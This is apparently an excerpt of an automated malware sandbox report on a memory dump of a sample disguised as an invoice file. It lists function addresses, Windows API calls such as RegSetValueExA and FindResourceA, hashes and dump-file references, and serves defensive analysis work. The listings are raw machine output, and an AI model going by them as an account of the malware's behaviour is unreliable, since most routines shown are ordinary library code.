Instruction Fuzzy Hash: A721A330304355FBFB245B66CC89BEABAA8EF45740F1086AAF91996291CB70DC44D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00BDC786, Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BDC78D
_strlen.LIBCMT ref: 00BDC7E1
__EH_prolog3.LIBCMT ref: 00BDC81A
_strlen.LIBCMT ref: 00BDC86E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3_strlen
String ID:
API String ID: 782648989-0
Opcode ID: b614ff9ef3d504dc5ac6e7a8aefdbc7f5824d0f15c363ebd0d0e29c32c154d85
Instruction ID: 59a39a38305119d2bc6635467f943906c466e71980368d41d157ee17aa9f5899
Opcode Fuzzy Hash: b614ff9ef3d504dc5ac6e7a8aefdbc7f5824d0f15c363ebd0d0e29c32c154d85
Instruction Fuzzy Hash: 42319F70500605ABCB10AFB8CD82BAEBBE1EF44750F10456EF959A7282DB709A04DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00BECDDB, Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BECDE7

Part of subcall function 00BBEB10: IsWindowEnabled.USER32(?), ref: 00BBEB1B

GetNextDlgGroupItem.USER32(?,?,00000000), ref: 00BECE1B
GetNextDlgGroupItem.USER32(?,?,00000000), ref: 00BECEA0

Part of subcall function 00BBE901: GetWindowLongA.USER32 ref: 00BBE90E

RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00BECE8F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$GroupItemNext$EnabledLongParentRedraw
String ID:
API String ID: 2934814974-0
Opcode ID: 3e9cb5b95354ad90b3c7ea95a033f8f7626343b3f0fd2bf752ee5a1c7eaaf3d4
Instruction ID: 2385459240c1520506481c0aba585d48e5879e1f32c7afed441d758aa28f8dde
Opcode Fuzzy Hash: 3e9cb5b95354ad90b3c7ea95a033f8f7626343b3f0fd2bf752ee5a1c7eaaf3d4
Instruction Fuzzy Hash: 7D2188B1701740EFEB255BB19C89FBE7AE9EB08700F140699F5419B191EBB5AC419610

Uniqueness

Uniqueness Score: -1.00%

Function 00C16FED, Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

RedrawWindow.USER32(?,00000000,00000000,00000585,?,?,00000000,?,00C172C7,00000002,00000000,?,?,?,00C00FDE), ref: 00C1701E
RedrawWindow.USER32(?,00000000,00000000,00000585,?,00000000,?,00C172C7,00000002,00000000,?,?,?,00C00FDE,?,00000000), ref: 00C1704B
RedrawWindow.USER32(?,00000000,00000000,00000185,?,00000000,?,00C172C7,00000002,00000000,?,?,?,00C00FDE,?,00000000), ref: 00C17088
RedrawWindow.USER32(?,00000000,00000000,00000585,?,?,?,?,00C00FDE,?,00000000), ref: 00C6EC52

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: RedrawWindow
String ID:
API String ID: 2219533335-0
Opcode ID: d9fee34819536b7db4e7359a37d870bf5a07525a5aab5ea093fe66c01c6719dc
Instruction ID: 3fff07a7c97ba77d6a3383a6133f67d78fa0300298d40c5b647beec1e0d9eef0
Opcode Fuzzy Hash: d9fee34819536b7db4e7359a37d870bf5a07525a5aab5ea093fe66c01c6719dc
Instruction Fuzzy Hash: 7D21F132604B12BBDB311B21DC45BA6B7B9BF49B20F250215FD54772E0EF60ED80EA90

Uniqueness

Uniqueness Score: -1.00%

Function 00C01000, Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

CreateFontIndirectA.GDI32(?), ref: 00C01057
CreateFontIndirectA.GDI32(?), ref: 00C01082

Part of subcall function 00C01A4B: __EH_prolog3_GS.LIBCMT ref: 00C01A52
Part of subcall function 00C01A4B: GetTextMetricsA.GDI32(?,?), ref: 00C01A87
Part of subcall function 00C01A4B: GetTextMetricsA.GDI32(?,?), ref: 00C01AC8

CreateFontIndirectA.GDI32(?), ref: 00C0102F

Part of subcall function 00BB3BD5: DeleteObject.GDI32(00000000), ref: 00BB3BE4

CreateFontIndirectA.GDI32(?), ref: 00C010BC

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CreateFontIndirect$MetricsText$DeleteH_prolog3_Object
String ID:
API String ID: 3178339408-0
Opcode ID: 4ab648b5315f4e359cae4d44441d2decb4cce5fb91ba99092f5bf193b46910ac
Instruction ID: 31c7d9ec33bbb9fb89b46115d51aeca11b42086b1c36fb69d76d92906e2319fa
Opcode Fuzzy Hash: 4ab648b5315f4e359cae4d44441d2decb4cce5fb91ba99092f5bf193b46910ac
Instruction Fuzzy Hash: 3121B072200204ABCB05AFA4CC59AEEB7E8AF44750F044955FD9793282DFB4DB15C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00BF09AA, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BF09C9
_strlen.LIBCMT ref: 00BF09DC
_strlen.LIBCMT ref: 00BF09F9
_strlen.LIBCMT ref: 00BF0A1A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: cd0bc8d73d0759951aa4d85c88128e2003d1b5a859fc59aa95a7fc1b8e788066
Instruction ID: 6662af1aeac7857a429c1401b4402f92f72a1ed35fb09e894925e9d122eb5a87
Opcode Fuzzy Hash: cd0bc8d73d0759951aa4d85c88128e2003d1b5a859fc59aa95a7fc1b8e788066
Instruction Fuzzy Hash: 181190629002487FDB01BF949C82ABF37ADEF41760F0480A9BD096B103EA656D15C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00BDE1AF, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000005), ref: 00BDE1CD
LoadResource.KERNEL32(?,00000000,?,?,?,?,00BDCB84,?,?), ref: 00BDE1E2
LockResource.KERNEL32(00000000,?,?,?,?,00BDCB84,?,?), ref: 00BDE1F4
GlobalFree.KERNEL32 ref: 00BDE233

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: 977470347ae32cfcbde7ae85c62380075ccc322c90a5dea5d24e43ffc45fb887
Instruction ID: c1e7671b8c57d23cef061c6c3c7cded7e8b9a6744b631c29814f20047d53a5e0
Opcode Fuzzy Hash: 977470347ae32cfcbde7ae85c62380075ccc322c90a5dea5d24e43ffc45fb887
Instruction Fuzzy Hash: 2611A231501722ABD7266B55C848BAEBBE8FF00361F0581A9F814AB311EB71ED00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C343E3, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C3440E
GetDC.USER32(00000000), ref: 00C34436
EnumFontFamiliesExA.GDI32(00000000,?,00C343BA,?,00000000), ref: 00C34451
ReleaseDC.USER32 ref: 00C34459

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: EnumFamiliesFontRelease_strlen
String ID:
API String ID: 273584299-0
Opcode ID: f6c2f5b5e10705a9ca2cfd707da8c6960d2ba326d5c57dab2f44a53ce4623012
Instruction ID: 0220a0fbb58f664a8102ad3384926a8b3a8173ba1c8667bb1f29743ea6f3ff7d
Opcode Fuzzy Hash: f6c2f5b5e10705a9ca2cfd707da8c6960d2ba326d5c57dab2f44a53ce4623012
Instruction Fuzzy Hash: 54117072D01218EBDB20EBA59C49EEF7BBCEF49714F004065FD01F3241EA24EA058AB5

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2645, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BB264C
CreatePen.GDI32(?,?,?), ref: 00BB266D
__EH_prolog3.LIBCMT ref: 00BB2696
ExtCreatePen.GDI32(?,?,?,?,?,00000004,00000000,?,00000058,00BA2A22), ref: 00BB26BD

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CreateH_prolog3
String ID:
API String ID: 569460412-0
Opcode ID: d52dc47e13aad75b2a3491cfbcf8da6f8a3fdcea0ee554ea066d67c5df7b0a03
Instruction ID: ab43b53fb7df93ecb73856277cbf8d0c3ced84bb4a79d625e95c2dbe9a503a89
Opcode Fuzzy Hash: d52dc47e13aad75b2a3491cfbcf8da6f8a3fdcea0ee554ea066d67c5df7b0a03
Instruction Fuzzy Hash: A9115971100209EBCF01EF54D811B9DBBE5EF08711F10845ABD599B311DBB2DA219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00BD519A, Relevance: 6.1, APIs: 4, Instructions: 58registryCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BD51B1
_strlen.LIBCMT ref: 00BD51EE
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00BD4563,00000001,80000000,?,?,00000000,00000010), ref: 00BD5201
RegCloseKey.ADVAPI32(?), ref: 00BD520C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$CloseValue
String ID:
API String ID: 2349324917-0
Opcode ID: 2f772409bce1166ec6c30830ff602ba832249a76d4dc92ec9e02a7dee800612e
Instruction ID: 7242775beb96d0ad990a1b7cd5a2e45e93fbec12e37561c120f67539f1155d82
Opcode Fuzzy Hash: 2f772409bce1166ec6c30830ff602ba832249a76d4dc92ec9e02a7dee800612e
Instruction Fuzzy Hash: D6019232951624FBEF316A608D06FBF77A8EF10B90F104095FE15FA240F6708E109AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4755, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BC4764
CoTaskMemAlloc.OLE32(00000000), ref: 00BC47A5
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?), ref: 00BC47BC
CoTaskMemFree.OLE32(00000000), ref: 00BC47C7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Task$AllocByteCharFreeMultiWide_strlen
String ID:
API String ID: 2767447272-0
Opcode ID: 1bc518baf432794c76db8f1850beb9f94be142f38402bf0ac9f9ec92dce6a5e8
Instruction ID: 0a4980402aa603435d138cbb566ff3fd233394ff70c8ba8e1692f9849bc2f44b
Opcode Fuzzy Hash: 1bc518baf432794c76db8f1850beb9f94be142f38402bf0ac9f9ec92dce6a5e8
Instruction Fuzzy Hash: D5018071911218FBDB115BA0DC85F8F7BECEB017A4F1042AAF905E2291E731CF5086A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE84B9, Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00BE84D5
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00BE84E8
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 00BE8516
DragFinish.SHELL32(?), ref: 00BE854B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: a759cbc0b4d75428402935e9aa32c825355ebe21fd70892b2c704c4e7cfbd521
Instruction ID: 3315b343486b768bd3b25648a3b84845fd7267e034cee79a08da6ae615389a0c
Opcode Fuzzy Hash: a759cbc0b4d75428402935e9aa32c825355ebe21fd70892b2c704c4e7cfbd521
Instruction Fuzzy Hash: B9114F75A00218EBCB549B25DC49DEE7BB8FF99710F000699E94AA7251CB709985CEA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8E14, Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BC8E39
GetWindowTextA.USER32 ref: 00BC8E6A
lstrcmpA.KERNEL32(?,00000001), ref: 00BC8E7C
SetWindowTextA.USER32(?,00000001), ref: 00BC8E88

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: TextWindow$_strlenlstrcmp
String ID:
API String ID: 3731183236-0
Opcode ID: 4797df91c3eb9598b42889cc3d4b7e1193f997a2ac94b2c5cebb33897412d085
Instruction ID: 3ee007ac87f95194b2ebc1dfc80733afb91802fe83cce9e3ec8366c0e931d089
Opcode Fuzzy Hash: 4797df91c3eb9598b42889cc3d4b7e1193f997a2ac94b2c5cebb33897412d085
Instruction Fuzzy Hash: F90180B5A00219ABDB10AF64DC85FEF73ECEB45740F1401A9B945E3240EAB49D458AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE350, Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,?,00000000,00000000,?,?,?,?,?,00BADE14,00000000,000000FF), ref: 00BAE36F
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00BAE384
MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,?,00000000,?,?,?,?,?,?,00BADE14,00000000,000000FF), ref: 00BAE39B
SysFreeString.OLEAUT32(00000000), ref: 00BAE3A7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ByteCharMultiStringWide$AllocFree
String ID:
API String ID: 447844807-0
Opcode ID: 42579c37a01625fdfeefbaa2e62567e0cf06e5bb431f15e083683341671d54e8
Instruction ID: a4a7e3cda1d2124045c0db710bd641fd4d5cc91c20b4115acf9773eeca5e1b63
Opcode Fuzzy Hash: 42579c37a01625fdfeefbaa2e62567e0cf06e5bb431f15e083683341671d54e8
Instruction Fuzzy Hash: FA017C32205214FFDB224BA5DC88EEF7FE8EB567A0F100258B91AD3290D631DA00D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB24E7, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BB24EE
CreateSolidBrush.GDI32(?), ref: 00BB2509
__EH_prolog3.LIBCMT ref: 00BB2532
CreatePatternBrush.GDI32(00000000), ref: 00BB2550

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: BrushCreateH_prolog3$PatternSolid
String ID:
API String ID: 3349454304-0
Opcode ID: f6887a9accf7f154ed0d62f581776a6a228a0b14e8b81ade5fb4d387725ca434
Instruction ID: ce9133b4c6867df4e6778d60d132916a47a02ab98d4ae0a4ca78b86f6101861a
Opcode Fuzzy Hash: f6887a9accf7f154ed0d62f581776a6a228a0b14e8b81ade5fb4d387725ca434
Instruction Fuzzy Hash: 0A118E70611205DBDB04AF94C9267ADB6E4EB48716F00805DF9458B342DBB5CE048BBD

Uniqueness

Uniqueness Score: -1.00%

Function 00BC425E, Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 00BC4271
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00BC4283
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00BC428E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 00BC42A6

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: f1ce1ef7d3f1132bbf7d9f444c3e1e572870295d4c96830e700588658751622a
Instruction ID: 2b5698bdf55fe206fe3cdc5fb22b3f9a9b01ef8bf55ca7c72688a68e21681322
Opcode Fuzzy Hash: f1ce1ef7d3f1132bbf7d9f444c3e1e572870295d4c96830e700588658751622a
Instruction Fuzzy Hash: 93F067B2610254BF66211B669C4DDBBAFFCDAC6BA5310016DB901C3300E6609E0081B0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0B44, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00BC0B59
_memcpy_s.LIBCMT ref: 00BC0B65
VariantClear.OLEAUT32 ref: 00BC0B8C
_memcpy_s.LIBCMT ref: 00BC0B9B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClearVariant_memcpy_s
String ID:
API String ID: 3791653706-0
Opcode ID: f67366e7a43ef874553de5894d0648b4067b02887a122f64cc41411110713401
Instruction ID: d675b134b8c57d64910db611c3bd2381b6c2977c982be9cba3285e00910d0d1b
Opcode Fuzzy Hash: f67366e7a43ef874553de5894d0648b4067b02887a122f64cc41411110713401
Instruction Fuzzy Hash: 95F0A936504318B3C21077AD9C05F9FB79CDF96720F050867F644D3242FAA1A55182B9

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8F9E, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BB8FAB
GetDlgItem.USER32 ref: 00BB8FC9
GetWindowTextLengthA.USER32(00000000), ref: 00BB8FD6
GetWindowTextA.USER32 ref: 00BB8FEA

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
